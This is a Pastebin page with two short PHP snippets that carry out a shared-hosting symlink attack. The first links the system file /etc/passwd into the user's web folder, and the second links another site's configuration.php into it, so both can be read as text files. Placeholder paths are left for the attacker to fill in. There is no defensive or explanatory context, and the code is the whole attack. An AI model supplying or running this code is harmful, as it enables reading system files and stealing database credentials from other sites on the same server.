Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $target = '/etc/passwd';
- $link = '/home/YOURPATH/site/etc_passwd.txt';
- symlink($target, $link);
- ?>
- <?php
- $target = '/home/PATHOFOTHERSITE/site/configuration.php';
- $link = '/home/YOURPATH/site/first_site_configuration.txt';
- symlink($target, $link);
- ?>
Advertisement
Add Comment
Please, Sign In to add comment